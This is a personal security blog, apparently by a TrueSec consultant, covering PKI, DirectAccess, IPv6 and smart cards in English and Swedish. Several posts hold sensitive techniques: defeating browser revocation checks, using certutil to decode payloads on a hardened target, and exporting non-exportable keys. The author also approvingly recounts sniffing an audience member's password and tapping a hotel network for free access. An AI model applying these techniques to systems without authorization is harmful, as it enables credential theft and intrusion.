My blog has moved to a new home at http://secadmins.com please adjust your links
Hasain
The practice of hard coding IPv4 addresses creates problems when modifying and existing application to support IPv6 or creating new IP version-independent applications.
The Checkv4.exe utility is designed to provide you with a code porting partner; a utility that steps through your code base with you, identifies potential problems or highlights code that could benefit from IPv6-capable functions or structures, and makes recommendations. With the Checkv4.exe utility, the task of modifying an existing IPv4 application to support IPv6 becomes much easier.
Recommendations for Running Checkv4.exe:
- Acquire the Checkv4.exe utility. The Checkv4.exe utility is installed as part of the Microsoft Windows Software Development Kit (SDK) released for Windows Vista and later. The Windows SDK is available through an MSDN subscription and can also be downloaded from the Microsoft website (http://msdn.microsoft.com).
- Run the Checkv4.exe utility against your code. Learn about how to run the Checkv4.exe utility against your files in the section on Using the Checkv4.exe Utility.
- The Checkv4.exe utility alerts you to the presence of common defines for IPv4 addresses, such as INADDR_LOOPBACK. Modify any code that uses literal strings with code that is protocol-version agnostic.
- Search your code base for other potential literal strings, as appropriate.
The Checkv4.exe utility can help you find common literal strings, but there may be others that are specific to your application. You should perform thorough searching and testing to ensure your code base has eradicated potential problems associated with literal strings.
/Hasain
Server side DirectAccess requires one network adapter to be configures as external with the Public or Private profile to apply the Connection Security rules. With the security connection rules in place the DirectAccess server will be able to offer IPSec authentication and tunneling to the clients.
Recently I was involved in a customer case where the DirectAccess server decided to change the external-facing interface to the domain profile, this caused the server to deactivate all security connection rules and the whole DirectAccess solution to stop working.
Now the decision about the profile type for a network interface in Windows is handled by the Network Location Awareness NLA service. The NLA probes for the possibility to reach the servers domain and if a connection is successful the profile will change to domain and the interface will be categorised as "Intranet Authenticated" according to NLA.
The solution or rather said the reason for the sudden change in the specific customer case was firewall related. The firewall was configured to allow traffic from DMZ, where the DirectAccess server external interface was connected, to the internal domain network, this caused NLA to "see" the domain over the external interface and.... So the solution was simply to configure a deny rule prohibiting the DirectAccess server external IP from accessing internal resources and all was back to normal again!
The following registry location is good help when troubleshooting NLA related problems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList
/Hasain
Ladda ner TSINK PowerPoint tillägget och skapa roligare PowerPoint presentationer
Du använder detta verktyg på eget ansvar ;)
/Hasain
Tack alla som var med och diskuterade IPv6 med mig på Microsoft TechDays 2011
Bifogar min presentation för nedladdning
/Hasain
Just follow the steps below:
1. IE setting for CRL checking of the server certificate is enabled
2. Set the hostnames of servers hosting the CRL and /or OCSP to 127.0.0.1 in your hosts file
3. Execute [certutil.exe -urlcache * delete] to remove all cached CRLs
4. Start your browser and tell it to HTTPS:// to the site
5. It will take some time trying to check the CRL/OCSP from the non-existing server
6. After that you are on the site without any warnings! Not really what I expected?!
Firefox gives the same results and only Google Chrome gives us a warning...
What if the same happens with Code Signing? Interesting case we have!
/Hasain
with my login id and code included and fully readable for everyone.
It is a folded paper with a tiny piece of tape holding the middle of the long edge
If you apply some pressure on the paper then tne content is fully readable with the login ID and Pin Code
Google‘s security philosophy:
As a provider of software and services for many users, advertisers and publishers on the Internet, we recognize how important it is to help protect your privacy and security…..
Hi,
The last Second Wednesday this year is going to be about DirectAccess. Why, who, how, when and what is it all about? Take the opportunity to discuss all of that and much mor…
Read more and reserve your free seat at:
http://www.labcenter.se/2w.aspx
or
http://www.facebook.com/event.php?eid=104672269605105&num_event_invites=0
See you the 8:th of December at LabCenter in Stockholm.
BR
Hasain
I am not going to deliver any session at Tech·Ed Europe 2010 but you can still find me at the TLC (Technical Learning Center) | Server & Cloud Platform | Management & Security Station on Wednesday, November 10, 2010 14:45-17:30 to answer your questions about security and ADCS
You can as well connect with me after the Breakout sessions with Marcus Murray on:
-
Tuesday, November 9 | 12:00 PM - 1:00 PM | Hall 7.2c Dublin
-
Thursday, November 11 | 2:30 PM - 3:30 PM | Hall 7.2c Dublin
/Hasain
Yet another day of troubleshooting DirectAccess, this time it was about a broken IPHTTPS tunnel. During the troubleshooting we recognized that the client is not able to establish a connection the the IPHTTPS url https://da.domain.com/IPHTTPS, using a network sniffer we could very clear see the server sending a reset packet after the Client Hello message. This indicates that the SSL server is not able to continue communicating using SSL. Knowing that there was a certificate change just a few days before this error occurred we found that the old certificate was still used for the SSL binding at the DA server even though the configuration was reapplied using the DA management console after the certificate change.
When changing the certificate used for the IPHTTPS tunnel it is very important to clear the old SSL certificate binding before adding the new one.
If you configured your DirectAccess using the DA management console follow the steps below to change the IPHTTPS certificate:
· Run the command: netsh http show sslcert
This will show the current sslcert binding with details about ip, port and the certificate
· Delete the old bindning using the command: netsh http del sslcert
· Using the DA management console, select the new IPHTTPS certificate, save an apply the new configuration
If you configured your DirectAccess using scripts or netsh commands to define all setting follow the steps below to change the IPHTTPS certificate:
· Run the command: netsh http show sslcert
This will show the current sslcert binding with details about ip, port and the certificate
· Delete the old bindning using the command: netsh http del sslcert
· Add the new sslcert binding using the command: netsh http add sslcert
/Hasain
Det går att implementera och migrera till Windows 7, Windows Server 2008 R2 och Hyper-V R2 på massor av olika sätt, några direkt skadliga, andra helt ok med diverse för- och nackdelar och självklart vissa riktigt bra och genomtänkta.
Utmaningar som att samexistera med XP under en period, uppgradera roller som
AD, DNS, DHCP, Clustering, att ändra kommunikationsprotokoll och införa
nya funktioner som Direct Access m.m. kräver en hel del av oss som jobbar med IT.
På Summiten får du den osminkade sanningen och tipsen som du inte finner
i manualerna om hur du inför den senaste tekniken på bästa sätt i din IT-miljö.
Mer information och agenda finns på http://infrastructuresummit.se/
Vi ses den 7:e oktober
/Hasain
Just some important IPv6 prefixes to remember whenever dealing with DirectAccess or IPv6 as such, have fun and remember to think in HEX J
Global-Unicast - 2000::/3
6to4 - 2002::/16
Teredo - 2001:0000::/32
Link Local Unicast -- FE80::/10
Unique Local Unicast – FC00::/7
Multicast - FF00::/8
DirectAccess IPv6 addressing:
2002:WWXX:YYZZ:8000::/49 as the organizational prefix
2002:WWXX:YYZZ:8000::/64 as the ISATAP prefix
2002:WWXX:YYZZ:8001::/96 as the NAT64/DNS64 prefix
2002:WWXX:YYZZ:8100::/56 as the IP-HTTPS prefix
/Hasain
DirectAccess är mer än bara ett alternativ till VPN och för att kunna ansluta till interna resurser via Internet. DirectAccess kommer att förändra vår syn på nätverksdesign och tillsammans med IPv6 skapa oanade möjligheter till öppnare och säkrare infrastruktur oavsett var våra klienter befinner sig.
Under två dagar kommer du att förstå principen bakom DirectAccess och vilka komponenter och system den är beroende av. Du kommer även att förstå och kunna hantera de olika alternativen i båda renodlade IPv6-miljöer och blandmiljöer med båda IPv4 och IPv6 i olika grad.
Under labben kommer vi dessutom att skapa en förståelse och lägga grunden för IPv6 och skapa förståelse för kravet och hur vi kan hantera det kommande generationsskiftet i våra nät och framför allt hur samexistensen kan hanteras.
Genom att testa de olika alternativen för hur man bygger DirectAccess kommer du att kunna välja rätt strategi för just din DirectAccesss implementation till din it-miljö.
Vi ses den 25:e oktober på LabCenter i Stockholm. Labben bokas på http://labcenter.se/Lab/2068
/Hasain
Using Microsoft Base Smart Card Crypto Provider, smart cards can use a card module to enable the smart card in Windows. Windows 7 features enhanced support for smart card–related Plug and Play making Windows able to use smart cards from vendors who have published their drivers through Windows Update without needing special middleware to be preinstalled.
If the smart card used does not have drivers/card module available through Windows Update or if you want to preinstall the driver during operating system deployment you need then to perform the following steps:
Having the card module installation files aailable in the desitnation computer run the command
RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\crdmxxx.inf
The crdmxxx.inf is the name of the inf file included in the card module package you are installing
Kunde inte låta bli att notera texten nedan på ett informationsblad som beskriver hur man gjorde för att ansluta till ett trådlöst WIFI nät. Det som drog min blick extra mycket var notisen på bladet som syns på bilden nedan.
Jag blir riktigt fundersam när jag ser sådana beskrivningar där vi lär våra användare ett felaktigt beteende. Vad tror vi kommer att hända om samma användare får ett liknande fel när han eller hon surfar till sin internetbank eller företagets webbmail mm.
/Hasain
IEEE 802.1X authentication protocol for WinPE is available as a hotfix download. Thanks to Ronni Pedersen and Johan Arwidmark (http://www.deployvista.com) for pointing it out :)
IEEE 802.1x for WinPE 3.0
http://support.microsoft.com/kb/972831
IEEE 802.1x for WinPE 2.1
http://support.microsoft.com/kb/975483
/Hasain
A graphical tool that facilitates testing and deployment of smart cards:
- Initialize a smart card.
- Enumerate the contents of a smart card, including certificates, files, directories, and crypto key names.
- Delete & Clean a smart card.
- View and initialize smart card root certificates.
SmartUtil supports cards that implement the card module/mini-driver interface defined by Microsoft. The tool is provided by JW Secure, Inc. and can be downloaded here.
/Hasain
Det har väl inte undgått någon att DoS attacker är ganska populära nu så här kommer en förklaring saxat ur DN.SE:
"Så kallad Dos-attack. Mejl skickas samtidigt från en mycket stor mängd datorer, vilket får den mottagande hemsidan att krascha"
Det tål att fundera på vad orsaken till denna, minst sagt, konstiga förklaring kan vara. Är det brist på kunskap, tydlighet eller oförmåga att förklara sådana abstrakta ting för icke nördar/tekniker.
Jag tror att vi som kan detta behöver vässa förmågan att kunna förklara på lite enklare och tydligare sätt så att "vanligt folk" kan förstå...
/Hasain
Jag har nöjet att presentera gruppen Swedish Windows Security User Group som fokuserar på att erbjuda alla medlemmar möjligheten att kunna nätverka andra experter och kunniga på området med målet att sprida information och kunskaper om säkerhetsfrågor.
Gruppen kommer att användas ett forum på itproffs.se som gruppens publika informationsplats där vi bl.a. meddelar våra aktiviteter samt tar emot förfrågningar om medlemskap och delaktighet i gruppen. Alla medlemmar som dessutom är aktiva itproffs medlemmar uppmanas att fortsätta sitt engagemang i andra forum som fokuserar på säkerhet och inte flytta sina aktiviteter till gruppen privata areor som finns på http://winsec.groups.live.com.
Gruppen kommer att använda http://winsec.groups.live.com under en period tills vi har fått bättre förutsättningar inom ramen för itproffs så att vi kan använda den nya plattformen för gruppens privata behov.
Vi har som mål att anordna återkommande träffar och möten för diskutera intressanta nyheter och ämnen samt utöka gruppens möjligheter att sprida och dela med sig av kunskaper kring säkerhet i Windows plattformen.
mvh
Hasain
Tack för en givande dag på Operaterassen i Stockholm, det blev en mängd mycket givande diskussioner kring lagring, säkerhet och en del annat.
Hoppas det blir en massa lika spännande frågor i Malmö nästa vecka...
/Hasain
How do I delete all Failed Requests logged on my Certificate Services database?
The Certutil tool can be used to list and delete Failed Requests logged on any ADCS database, but the two operations cannot be combined in one request and you have to manually transfer the request is from the listing of failed requests to the deleterow command.
The attached script combines the two steps and automate the whole process for an easier management task.
/Hasain
-----------------------------------delete_failed_adcs_requests.vbs-----------------------------------
Set objShell = CreateObject("WScript.Shell")
Set objWshScriptExec = objShell.Exec("certutil -silent -view -out ""RequestID"" LogFail")
Set objStdOut = objWshScriptExec.StdOut
Do Until objStdOut.AtEndOfStream
strLine = objStdOut.ReadLine
If Len(strLine) > 10 Then
Set regEx = New RegExp
regEx.Pattern = "( .*?\(|\))"
regEx.IgnoreCase = True
regEx.Global = True
regEx.MultiLine = True
WScript.Echo "Deleting: " & strLine
Set objWshScriptExec = objShell.Exec("certutil -deleterow " & regEx.Replace(strLine, ""))
End If
Loop
-----------------------------------delete_failed_adcs_requests.vbs-----------------------------------
A must have tools for all of you with minidriver based smart cards to manage admin and user pin on such cards. The tool is free to download and use as well as to modify or reuse the code in other projects.
Many thanks to Björn Österman who made the tool available.
/Hasain
---------------------------------------------------------------------------
scUtil.exe, version 1.0, Author: Bjorn Osterman, Company: TrueSec AB, Sweden
syntax: scUtil.exe unblockpin <adminkey> <newpin>
scUtil.exe changepin <oldpin> <newpin>
scUtil.exe changeadminkey <oldadminkey> <newadminkey>
scUtil.exe calculateresponse <adminkey> <challange>
scUtil.exe generaterandomkey
<adminkey> is one the the following alternatives:
- 48 hexadecimal characters
- "default", representing 48 zeroes
- "random", representing 48 random hexadecimal characters
<pin> is variable-length string composed of alphanumerical characters
---------------------------------------------------------------------------
Are you wondering about how scalable ADCS is?
An interesting ADCA scalability testing was done at the Enterprise Engineering Center (EEC) by the Windows Server Engineering Team showing that it is possible to produce more than 20 million certificates in less than 24 hours using a cluster of 10 ADCS VM!
Read more about this test at: http://blogs.technet.com/wincat/archive/2009/08/10/scale-testing-the-world-s-largest-pki-all-running-on-ws08r2-and-hyper-v.aspx
/Hasain
The following table lists the AD CS components that can be configured on different editions of Windows Server 2008 R2.
|
Components
|
Web
|
Standard
|
Enterprise
|
Datacenter
|
|
CA
|
No
|
Yes
|
Yes
|
Yes
|
|
Network Device Enrollment
|
No
|
No
|
Yes
|
Yes
|
|
Online Responder
|
No
|
No
|
Yes
|
Yes
|
|
CA Web Enrollment
|
No
|
Yes
|
Yes
|
Yes
|
|
Certificate Enrollment WS
|
No
|
Yes
|
Yes
|
Yes
|
|
Certificate Enrollment Policy WS
|
No
|
Yes
|
Yes
|
Yes
|
The following features are available on servers running Windows Server 2008 R2 that have been configured as CAs.
|
AD CS features
|
Web
|
Standard
|
Enterprise
|
Datacenter
|
|
Customizable version 2 and 3 templates
|
No
|
Yes
|
Yes
|
Yes
|
|
Key archival
|
No
|
Yes
|
Yes
|
Yes
|
|
Role separation
|
No
|
No
|
Yes
|
Yes
|
|
Certificate manager restrictions
|
No
|
No
|
Yes
|
Yes
|
|
Delegated enrollment agent restrictions
|
No
|
No
|
Yes
|
Yes
|
|
Certificate enrollment across forests
|
No
|
No
|
Yes
|
Yes
|
den 18 juni 2009 12:00 - den 18 juni 2009 14:00 lokal tid, LiveMeeting - Sverige
| Språk: |
Svenska. |
| Produkt(er): |
Windows 7 och Windows Server 2008. |
| Publik: |
IT-expert. |
|
|
|
|
Evenemangsöversikt
Välkommen att delta i vårt online seminarium för IT-proffs!
Vi startar kl 12 och håller på i minst en men max två timmar, och du har möjlighet att ställa frågor i slutet av seminariet.
Next Generation Windows Security
Äntligen är den här! Nu kan alla bygga det genom tiderna säkraste Windows systemet med hjälp av komponenter från Windows 7 & Windows Server 2008 R2 som innebär en mängd nya och spännande möjligheter inom området säkerhet i Windows plattformen.
Vi granskar Authentication Assurance, NTLM Restrictions, DNSSec, Direct Access, Bitlocker To Go, Managed Service Accounts, SRPv2 och givetvis alla nyheter inom PKI och hantering av certifikat och smartkort.
Talare: Hasain Alshakarti, TrueSec
Målgrupp: IT-proffs
|
Thanks to all of you who attended the Part I of the Security Summit 2009 yesterday and a special thanks to our guest Robert ‘RSNAKE’ Hansen.
Here is a list of the tools we used at the session presented by me and Marcus Murray:
See you all again at Part II
/H
The default setting of the "CertSrv Request" component in Windows Server 2008 does not allow administrators to change the settings of the component. If your certification authority is behind a firewall or if you want to allow for connections to the service using static TCP ports; you need then to enable modification settings of' the 'CertSrv Request' component by following the steps below:
- Open Register Editor to 'HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{D99E6E74-FC88-11D0-B498-00A0C90312F3}'
- Right click the {D99E6E74-FC88-11D0-B498-00A0C90312F3} key (AppID of Certsrv Request), choose permission
- Take the ownership to Administrators. Then grant the Administrators 'full control' permission
- Start the dcomcnfg.exe and change the setting
Use with great care!
/Hasain
Vi har skapat ett unikt mötesrum för tekniker, jurister, affärsutvecklare, myndighetschefer och leverantörer att träffas och handfast utväxla kunskap om tillförlitliga och säkra identiteter. Vi har samlat ledande intressenter under en interoperabilitetsövning under två dygn som, bland annat, ska ge svar på:
- Hur e-legitimationer av olika utfärdare fungerar tillsammans
- Hur aktiva kort från olika tillverkare fungerar ihop på mängder av olika tekniska plattformar
- Hur juridiken kan stödja tekniken
- Vilka fallgropar som finns rent semantiskt mellan teknik och juridik
- Vilka processer som krävs för att effektivt ta tillvara tekniken i sin organisation
Vår samlade erfarenhet inom området är närmare 100 år. Trots det stöter vi dagligen på fallgropar som hindrar en effektiv användning av e-legitimationer och aktiva kort. Ytterligare dokument är det sista som behövs. Istället behöver vi skapa ett mötesforum för intressenterna.
E-legitimationer används med stor framgång av hundratals myndigheter och näringslivsaktörer för att ge bättre service till sina slutanvändare. De senaste åren har en ny form av användning brutit mark och alltfler väljer att tala högt om behovet av tjänstelegitimationer.
Grundvalarna för ett fungerande handelssamhälle bygger på förtroende att:
- Vi vet vem vi interagerar med
- Vi kan enas om en tjänst/vara
- Ingångna avtal fullföljs
Vi har upprättat mekanismer för att:
- Kontrollera någons identitet med hjälp av handlingar utgivna av en betrodd part
- Specificera vad vi vill göra i form av produktbeställningar eller tjänsteleveranser
- Skriva under avtal där parterna förbinder sig att uppfylla det som överenskommits
E-samhället förändrar möjligheterna att verka på global basis för alla parter, men grunderna är desamma. Vi måste göra ”som vi alltid har gjort”! Det är här e-legitimationen kommer in i bilden. E-legitimationen är, utifrån förtroendeperspektivet, grundbulten för ett fungerande e-handelssamhälle. Tillsammans med aktiva kort i någon form kan en framtidssäker plattform för förtroenden byggas. Låt oss mötas kring den på LabCenter i höst!
Hasain Alshakarti, Senior Security Advisor, TrueSec AB
Bertil Bergkuist, Seniorkonsult, CAG Arete AB
Carl Hössner, PKI- och säkerhetsexpert, Finansiell ID-teknik AB
Lars Johansson, Säkerhetsexpert, Omegapoint AB
Roberth Lundin, Software Engineer, Steria AB
Predrag Mitrovic, VD, LabCenter AB
Pål Ragnarsson, Solutions Manager, HID Global
One very common reason to this issue is that the CA is not able to read the content of the template; this is often because the authenticated users group has been removed from the ACL list of the template. To solve this without reusing the authenticated users group you can give the computer account of your CA read permissions to the specific template.
If the above is not true, make sure the templates is listen in the templates to issue for your CA and that the template is available throughout your Active Directory.
/Hasain
Jag har startat ett litet projekt som går ut på att kartlägga XSS problem hos olika nättidningar och andra nyhetsmedia, rapportera felen till ansvariga och se vad som händer för att fortlöpande rapportera om aktiviteten här för de som är intresserade!
Lite regler först för vad som kommer att finnas tillgängligt:
- Inga namn eller adresser
- Inga texter från ev. epost med de berörda
- Antal hittade sårbarheter & användbarhet
- Mina kommentarer och tankar om det jag hittar
Jag har tills idag rapporterat till tre olika tidningar varav en svarat mycket snabbt och faktiskt åtgärdat en del av problemen
Fix rate är altså 1/3!
Har du bra tips på tidningar eller andra nätbaserade nyhetsmedia som bör vara med så meddela detta till mig genom e-post på:
h a s a i n (snabel a) t r u e s e c (punkt) s e
/Hasain
Tack alla deltagare som besökte våra sessioner på TechDays i västerås, som jag lovade så bifogar jag mina anteckningar som jag gjorde under min session om PKI i denna post
Observera att filen måste döpas om till .xps
/Hasain
I was recently involved in a penetration testing activity together with some of my team members at TrueSec and we simply ran into a little issue where we needed to convert some binary files to a more convenient format to be able to transfer to the target system we were working with. This is normally not a big issue but this system was a little bit more tightened than what we normally see at customer’s sites. We could for instance not use WSH to create a decoding script as the system required all scripts running to be signed and when we looked for the debug command it was not there anymore!
So the challenge was to find a tool already built into the Windows platform that could perform any kind of decoding from text to binary. Since Windows 2000 there is built-in command-line program called certutil.exe for managing Certificate Services and certificate related tasks, this nice tool provides a way to encode and decode files using the Base64 schema. As this tool is one of many built-in tools in Windows, the system did not had any issues to let us use it for the purpose of decoding our Base64 encoded text stream we managed to transfer to the server and the saga could continue as planned, or should I say as we planned :)
/Hasain
To import keys using the Microsoft Base Smart Card Crypto Service Provider you need to performe the following steps:
- Modify the registry keysbelow:
- HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Base Smart Card Crypto Provider\AllowPrivateExchangeKeyImport=DWORD:0x1
- HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Base Smart Card Crypto Provider\AllowPrivateSignatureKeyImport=DWORD:0x1
- Use the certutil.exe tool to import the key stored in a pfx file:
- certutil –csp "Microsoft Base Smart Card Crypto Provider" –importpfx {PFXfile}
/Hasain
What if you could add add group membership to a user's access token when the user is authenticated using a certificate-based logon method and making the policies included in the certificate to decide what groups should be added.
This is now possible using the Authentication mechanism assurance feature in Active Directory Domain Services (AD DS) in Windows Server 2008 R2. When enabling this feature a user's access to resources on the network when authenticated using certificate based logon can be treated as different from what that access would be when the user types a user name and password as the user's group membership is changed reflecting the authentication method used
This feature is intended for organizations that use certificate-based authentication methods, such as smart card or token-based authentication systems. Organizations that do not use certificate-based authentication methods will not be able to use authentication mechanism assurance, even if they have Windows Server 2008 R2 domain controllers with their domain functional level set to Windows Server 2008 R2.
The best part of this feature is that any client or server operating system that is able to interpret Windows access tokens can be used to grant or deny access based on the group membership or memberships that are added to a user's token by authentication mechanism assurance.
/Hasain
This is the third time i have been asked if I consider it fine to copy an issuing CA:s keys and certificate to the new device the network department just installed for the simple reason that it needs to enroll certificates from a trusted CA, and be able to performe SSL Inspection on all outbound HTTPS traffic without causing certificate errors on the clients.
If you think about it for a while, and specially if your issuing CA is AD integrated, would not that mean that your network department can just impersonate any account in your AD? Sure you trust the network department but what about that device and the software used?
The main reason to do SSL Inspection is to be able to filter on the content of the "secure universal firewall bypassing protoocol", yes the bad guyes are using it to fool your IDS, IPS, Layer 7 Firewall etc. What do you think would happen if the SSL Inspection layer you are using hade som vulnerabilities, yes this kind of software does have vulnerabilities as well, that could be used by an attacker to extract your issuing CA keys and certificate and....
The best answer would be to create a new self signed CA certificate and trust that in your client computers for server authentication purposes such as to prove the identity of webservers. This CA should not be trusted by any of your servers and none of your DCs for som very clear reasons.
My advice to you is to be very carefull where you put your CA keys and how far you can trust the place!
/Hasain
Då var TechEd EMEA 2008 över för denna gång, och jag har en av mina session på 4:e plats i top-ten listan för bästa product demo bland totalt ca 50 andra sessioner.
/Hasain
I would like to thank all of you who attended my sessions at TechEd EMEA 2008 and hope I can see you next year
Attached you will fins my notes from the SDI session
BR
Hasain
En session om Server & Domain Isolation är nu färdig, och jag är mycket nöjd att det blev så bra!
Som avkoppling så sökte jag mig till en av Jesper Johanssons sessioner där han diskuterade problemen med it-säkerhets industrin, han hade en mängd mycket befogat kritik mot hur branchen jobbar och menad på att vi bara gör det svårade för oss själva när vi tar fram produkter och lösningar som inte går att använda på rätt sätt om man inte är själva utvecklaren.
Under tiden jag satt och lyssnade på Jesper så började jag förbereda min session på fredag som kommer att handla om WLAN, jag satte igång lite WLAN sniffning i förhoppningen att få fram lite klar text lösenord, efter bara några minuter så kom det första lösenordet fram, till ett pop3 konto som någon i publiken körde. Det kommer att bli mer WLAN sniffande idag och jag hoppas på en bra skörd :)
På kvällen var det dags för lite mingel med alla svenskar som är på TechEd, stället var mycket trevligt och folket ännu trevligare...
/Hasain
Det är en mängd förberedelser och saker som ska funka innan man kan genomföra en presentation här på TechEd, jag hade till exempel en s.k. Technical Check tidigt på morgonen och sedan var det lite powerpoints (det blir 4-5 slides med lite namn, agenda och länkar) som skall laddas upp så att deltagare kan ha de pluss mina egna demo maskiner som ska funka...
Det är ganska kritiskt att Internet är tillgängligt för mig så min första fråga till de i receptionen på det hotell jag bor på var om det ingår något Internet i den bokning som TechEd teamet har fixat åt mig, när deras svar var "det kostar 12€ per 24 timmar" så lät jag saken vara med siktet inställt på att kolla lite olika alternativ först. När jag började kolla "alternativen" kunnde jag konstatera att tv:n var kopplad till en dosa med en RJ45 rätt in i väggen, den gav mig ingen IP-adress när jag kopplade in min dator där så jag började titta på själva dosan som satt under TV:n. På dosans under sida satt det en lapp med lite olika text och en ena halvan av en ip-address som var 16.15.
Nu var jag bara tvungen att hitta resten och testa om det faktiskt är möjligt att komma åt något på detta mystiska TV-nät så jag kopplade in tv-boxen till min dator och började sniffa lite nätverkstrafik och vips så talade den om för mig mycket snällt om ip-nätet och den gateway som boxen var konfigurerad med. Nu har jag altså hela ip-adressen samt GW:n så det borde vara go vilket det också gjorde!
Det går altså att i just detta fall få gratis Internet genom att ansluta datorn istället för TV:n i det RJ45 uttag som finns i rummet och jag kan bara inte låta bli att fundera på vad mer man skulle kunna komma åt på det nätet med tanke på att man i TV:n kan komma åt information om sin bokning och saldot på fakturan för de rum man bokat. Är det någon annan än jag som börjar få lust att trycka på den stora röda knappen här?
I och med att det var öppningsdagen för TechEd idag så var jag tvungen att kolla in keynoten och jag kan väl sammanfatta den med följande:
- Windows Server 2008 R2 & nästa version av Hyper-V implementation med Live Migration which means the migration
- System Center Virtual Machine Manager får ett tillägg som kallas Performance and Resource Optimizer som kan hålla koll på SLA och resurser
- Virtualisering som möjliggör att man kan separera applikationen från OS:et. Det kommer altså att vara möjligt att patcha OS och applikationer separat med väldigt liten eller ingen påverkan åt andra hållet.
- System Center hanterar/kommer att hantera Linux, Sun OS, AIX…
- Cloud computing
- Security Intelligence Report v5
- Forefront Client Security v2
- Identity Lifecycle Manager v2
Nu är det bara en dag kvar till min första session....
/Hasain
Efter säkerhetskontrollen på Arlanda och den numera standardmässiga frågan om alla de datorer, som jag plockade upp och la på bandet, var mina så spang jag på Joakim Nässlander som också var på väg till TechEd. När det väl var tid för att stiga ombord på planet hade samligen av likasinnade blivit tämligen stor och kön ringlade lång utan för gaten.
Några timmar att koppla av och förbereda sig rent mentalt för TechEd tänkte jag men det varvades med en mycket intressant diskussion med en SQL-administratör från ett stort svensktbolag, diskussionen kretsade givetvis kring säkerhet, branväggar, WLAN, IPSec, dåliga lösenord, webappar, senaste Windows buggen och en massa beroenden.
Jag tycker att frågorna som vi avhandlade var så intressanta att jag kommer att skriva en serie blogginlägg där jag försöker belysa problematiken om och kring it-säkerheten idag som den komponent som måste finnas med i nästan allt arbete som utförs inom och kring it-system.
Det kommer säkerligen att vara många fler intressanta diskussioner under veckan som kommer och för er som inte är på plats här så kommer jag att försöka förmedla så många som möjligt via denna blogg
/Hasain
The TrueSec Team is now involved into the Windows 7 TAP and the security features of Windows 7 will be on my list to understand, test, deploy and explain :)
/Hasain
Is it possible to migrate a Windows Server 2003 based Certification Authority to Windows Server 2008?
The answer is yes but you need all detailes in the Active Directory Certificate Services Upgrade and Migration Guide from Microsoft found at http://www.microsoft.com/downloads/details.aspx?FamilyID=C70BD7CD-9F03-484B-8C4B-279BC29A3413&displaylang=en
The short answer would be that you need to performe the following steps:
- Backup your existing CA using the certutil -backup command
- Install the new Windows Server 2008 CA with the same name as the replaced server
- Add the ADCS role and import the CA-certificate from the backup
- Upgrade the templates to WS2008
- Restore the old CA database using the certutil -restore command
/Hasain
Man har åter igen lyckats hamna med i Computer Sweden:s lista över landets 75 vassaste IT-säkerhetsexperter, mycket smikrande och roligt att få den bekräftelsen på det man gör samtidigt som det är en utmaning att bli ännu bättre till nästa år.
Det som är extra roligt i år att det är tre personer från TrueSec samt Predde från LabCenter som är med i listan :)
/Hasain
Jag kommer att köra två sessioner på årets Tech-Ed EMEA. sessionerna kommer att handla om säkerhet i WLAN samt Server & Domain Isolation och hur man rent praktiskt bygger enligt konceptet.
Myths and facts of WLAN security
It's actually quite easy to secure
wireless networks, manually configuring MAC addresses or disabling SSID
broadcasting is not a substitute for an appropriate encryption
standard. Based on our real life experiences we will guide you through
some simple steps to secure your WLAN infrastructure building a secure, easy to manage and working wireless networking using components already built into
your Windows Servers and clients.
Server and Domain Isolation = a dynamic secure network
A demo based on a customer case
setting up the next generation secure network. Enabling the users to
dynamically connect and gain access to resources, based on a
combination of user and computer security configuration regardless of
their physical location, using the Windows Firewall with Advanced
Security and Network Access Protection components built into Windows
Server 2008 and Windows Vista.
Vi ses i Barcelona
/Hasain
Många har ställt frågan om mjuka cert går att exportera i Windows trotts att man flaggat den privata nyckeln som icke exporterbar och svaret har alltid varit JA, det går bra att läsa av den privata nyckeln även i ett sådant fall då den bara skyddas av systemanrop i Windows.
Nu finns det ett fungerande verktyg för att exportera privata nycklar med tillhörande certifikat från ett Windows system oavsett olika flaggor om export. Verktyget heter Jailbreak och finns att ladda ner från isecpartners.
Observera att verktyget klassas som trojan/trojan loader av de flesta antivirus!
Bankärenden med certifikat men utan smartkort eller en kombinerad OTP har aldrig varit ett alternativ för mig ;)
/Hasain
As I promised during our presentations at TechED US 2008 you can now find the sqlshell tool I created for TechED 2008 attached this blog post.
The tool was created during my flight to Orlando, if you find any problems or want any additions to the tool send me a notice and I will include that in the next release of sqlshell
BR
Hasain
Efter en avslutad sista dag på Teched tog jag och Johan Arwidmark en taxi till flyget, väl på flygplatsen så var det åter dags att passera säkerhetskontrollen med mina 6 laptops och till min förvåning så fick jag samma glada min och just samma fråga om jag var en datorförsäljare av de som stod vid kontrollen på Orlando International Airport.
En anna på säkerhetskontrollen undrade varför jag hade så många när jag svarade nej på frågan som jag fick först och då förklarade jag snabbt mitt ärende på Teched och de svarade väldigt artigt: Have a nice flight home sir!
Väl på planet så började jag slummra till redan innan planet började taxa, jag och Marcus hade ju vänt på dygnet så att vi var vakna från ca 11-12 på natten tills vi var färdiga med våra sessioner dagen efter och så körde vi alla dagar efter precon. Jag somnade som sagt väldigt snabbt och hade en ganska god sömn i förhållande till det faktum att man satt på ett flygplan och detta i ekonomiklassen.
Jag vaknade ca 45 minuter före landning och i samma stund som jag reste mig ur min stol så tände piloten lampan för säkerhetsbältet då inflygningen påbörjades så jag skynndade att tvätta snsiktet och på väg tillbaka till min stol så säger en av flygvärdinnorna undrande "Du åt och drack inget under hela resan, du får väl ta lite vatten innan du sätter dig".
Nu var det dags att passera säkerhetskontrollen på Frankfurts flygplats, nu kan man rutinen så fram med alla datorer i tur och ordning och samma förvånde och lättsamma min från personalen här också, och tro det eller ej samma fråga igen :)
Nu sitter jag hemma och skriver detta samtidigt som jag kan konstatera att detta var det absolut bästa Teched/Itforum jag varit på, det är väldigt lite sömn med extremt kul och roligt så här efteråt när man tittat i backspegeln och speciellt uppmuntran och den feedback som man får från deltagarna, nu blir det snart en efterlängtad semester men innan dess ska jag se till att skicka in mina förslag till sessioner på årets ITForum.
/Hasain
Nu när bara en dag återstår av Teched US så har man blivit en kändis här, vi har kört en preconf samt tre breakouts nu och Marcus skojade till det lite och skrev aka "The Wolf" som titel på mig på lite olika ställen i presentationerna så nu vet alla här att när "The Wolf" speaks yous should listen ;)
